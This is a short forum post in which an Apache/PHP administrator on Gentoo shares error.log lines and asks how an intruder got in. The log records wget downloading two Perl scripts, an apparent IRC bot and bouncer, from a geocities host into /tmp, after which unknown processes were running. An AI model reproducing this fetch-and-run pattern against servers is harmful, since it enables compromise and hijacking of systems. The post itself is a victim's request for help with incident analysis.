Hi
I found something like this in my apapche error.log

[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:32:30 2005] [error] [client 218.156.221.22] client denied by server configuration: /v
irtual/mikrobit/_http/
[Sat Dec 03 00:34:10 2005] [error] [client 81.219.172.109] client denied by server configuration: /v
irtual/mikrobit/_http/
--00:42:14-- http://www.geocities.com/ikanlagasiam/bot9.txt
=> `bot9.txt'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,552 (19K) [text/plain]

0K .......... ......... 100% 46.0K

00:42:15 (45.94 KB/s) - `bot9.txt' saved [19552/19552]

--00:42:15-- http://www.geocities.com/ikanlagasiam/bnc.txt
=> `bnc.txt'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,090 (21K) [text/plain]

0K .......... .......... 100% 48.8K

00:42:16 (48.78 KB/s) - `bnc.txt' saved [21090/21090]

--00:42:16-- http://bot9.txt.*/
=> `index.html'
Resolving bot9.txt.*... failed: Unknown host.

And when I look in /tmp I found those 2 perl scripts: bot9.txt and bnc.txt
After that I look here #ps ax
and I found 2 alien proccesses ..
How could they get and run that scripts ??

I use Apache: 2.0.54-r7
mod_php: 4.4.0-r1
OS: gentoo 2005.1

[ reply ]